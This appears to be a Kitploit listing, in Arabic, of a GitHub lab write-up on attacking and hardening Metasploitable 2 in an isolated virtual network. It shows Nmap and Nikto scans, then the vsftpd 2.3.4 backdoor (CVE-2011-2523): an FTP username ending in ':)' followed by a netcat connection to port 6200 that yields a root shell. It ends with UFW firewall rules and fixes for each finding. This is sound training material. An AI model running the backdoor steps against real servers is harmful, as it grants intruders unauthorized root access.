Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
network-security-lab — مختبر هجوم ودفاع افتراضي مُتحكم فيه — استغلال CVE-2011-2523، استكشاف Nmap، فحص Nikto، تقوية UFW على Metasploitable 2 | Kitploit
أدوات/GitHubGitHub/amirmuhammadmarvi/network-security-lab
الاستطلاعماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالتدقيق التكوينأمن الويبأمن الشبكاتاختبار الاختراقالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
مختبرات وتدريب عملي
GitHubamirmuhammadmarvi/network-security-lab

network-security-lab

مختبر هجوم ودفاع افتراضي مُتحكم فيه — استغلال CVE-2011-2523، استكشاف Nmap، فحص Nikto، تقوية UFW على Metasploitable 2

عرض المستودع
3منذ 3 أشهرلم تتم المراجعة بعد

🔬 مختبر أمن الشبكات

بيئة افتراضية محكمة تحاكي سيناريوهات الهجوم والدفاع الواقعية

Python Platform CVE Status


📋 نظرة عامة

يحاكي هذا المختبر اختبار اختراق وتمارين تحصين دفاعية في بيئة افتراضية معزولة تمامًا. يوضح دورة حياة أمن الهجوم الكاملة — من الاستطلاع إلى الاستغلال — والضوابط الدفاعية التي من شأنها تخفيف كل خطر.

النتيجة الرئيسية: تم تحقيق وصول كامل كجذر (root) على الجهاز المستهدف في أقل من 60 ثانية عن طريق استغلال باب خلفي معروف، دون الحاجة إلى بيانات اعتماد أو أدوات خاصة.


🏗 بيئة المختبر

المكوّنالتفاصيل
Hypervisor (برنامج التشغيل الافتراضي)VMware Workstation
الشبكةHost-Only / NAT (معزولة تمامًا)
نظام تشغيل المهاجمUbuntu 24 LTS
نظام تشغيل الهدفMetasploitable 2 (Linux 2.6.x)
عنوان IP المهاجم192.168.148.255
عنوان IP الهدف192.168.148.130

🎯 المنهجية

root@kitploit:~
Reconnaissance  →  Scanning  →  Exploitation  →  Defense & Hardening

🔍 المرحلة 1 — الاستطلاع

مسح المنافذ باستخدام Nmap

root@kitploit:~
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt

النتائج الرئيسية — 23 منفذًا مفتوحًا إجمالاً:

مسح الويب باستخدام Nikto

root@kitploit:~
nikto -h http://192.168.148.130 -o nikto_before.txt

تم العثور على 18 ثغرة، منها:

  • phpMyAdmin مكشوفة للعامة
  • ملف phpinfo.php يسرب كامل إعدادات الخادم
  • تفعيل HTTP TRACE (هجمات XST)
  • تفعيل فهرسة الدليل على /doc/ و /test/
  • Apache 2.2.8 و PHP 5.2.4 قديمان

💥 المرحلة 2 — الاستغلال

CVE-2011-2523 — الباب الخلفي لـ vsftpd 2.3.4

يحتوي vsftpd 2.3.4 على باب خلفي تم إدراجه من خلال اختراق سلسلة التوريد. إرسال اسم مستخدم ينتهي بـ :) يتسبب في فتح شل جذر على المنفذ 6200.

root@kitploit:~
# الخطوة 1 — تشغيل الباب الخلفي عبر FTP
ftp 192.168.148.130
# اسم المستخدم: backdoor:)      كلمة المرور: أي شيء

# الخطوة 2 — الاتصال بالشل المستغَل
nc 192.168.148.130 6200

# الخطوة 3 — التحقق من الوصول
whoami
# → root

النتيجة: تم تحقيق وصول كامل على مستوى الجذر (root) في أقل من 60 ثانية — بدون بيانات اعتماد، وبدون إطار عمل استغلال.

الأثر: يمكن للمهاجم صاحب صلاحية الجذر قراءة/تعديل/حذف أي ملف، تثبيت برمجيات خبيثة، تسريب بيانات، أو الانتقال إلى أجهزة أخرى على الشبكة.


🛡 المرحلة 3 — الدفاع والتحصين

جدار الحماية UFW — سياسة رفض افتراضية

root@kitploit:~
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp    # SSH فقط
sudo ufw status verbose

الإصلاحات الموصى بها


📄 التقرير الكامل

انظر report.md للحصول على التقييم الكامل — المنهجية الكاملة، مخرجات الأوامر، جدول النتائج، خطوات الاستغلال، وجميع توصيات الإصلاح.


⚠️ إخلاء مسؤولية قانوني

تم إجراء هذا المختبر في بيئة افتراضية معزولة تمامًا باستخدام برنامج ضعيف عمدًا (Metasploitable 2). جميع التقنيات لأغراض تعليمية وعرض أعمال فقط. لا تقم بتكرار ذلك على أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها.


🛠 الأدوات المستخدمة


المؤلف: Amir Mohammad Marwi

Portfolio LinkedIn GitHub

تنزيل الأداة
المنفذالخدمةالإصدارالمخاطرة
21FTPvsftpd 2.3.4🔴 حرج — باب خلفي معروف (CVE-2011-2523)
22SSHOpenSSH 4.7p1🟡 متوسط — قديم
23TelnetLinux telnetd🟠 عالي — بروتوكول نص عادي
80HTTPApache 2.2.8🟠 عالي — ثغرات متعددة (CVEs)
1524BindshellRoot shell🔴 حرج — شل جذر مفتوحة
3306MySQL5.0.51a🟠 عالي — قاعدة بيانات مكشوفة
5900VNCProtocol 3.3🟠 عالي — مصادقة ضعيفة
6667IRCUnrealIRCd🔴 حرج — باب خلفي معروف
الثغرةالإصلاح
الباب الخلفي لـ vsftpd 2.3.4الترقية إلى vsftpd 3.x أو الانتقال إلى SFTP
شل الجذر المفتوح (المنفذ 1524)تعطيل فورًا، ومراجعة التثبيت
Telnet (المنفذ 23)التعطيل — فرض SSH فقط
phpMyAdmin مكشوفةتقييد الوصول حسب IP، وفرض مصادقة قوية
MySQL مكشوف (المنفذ 3306)ربطه بـ localhost ومنع الوصول الخارجي
VNC مكشوف (المنفذ 5900)تقييد الوصول حسب IP أو تعطيله
فهرسة الدليلApache: Options -Indexes
HTTP TRACEApache: TraceEnable off
Apache و PHP قديمانالترقية إلى إصدارات LTS مدعومة
الأداةالغرض
Nmapمسح المنافذ واكتشاف الخدمات
Niktoفحص الثغرات على الويب
Netcatالاتصال بشل الباب الخلفي
UFWإعداد جدار الحماية على مستوى المضيف
عميل FTPتشغيل الباب الخلفي لـ vsftpd
VMware Workstationافتراضية المختبر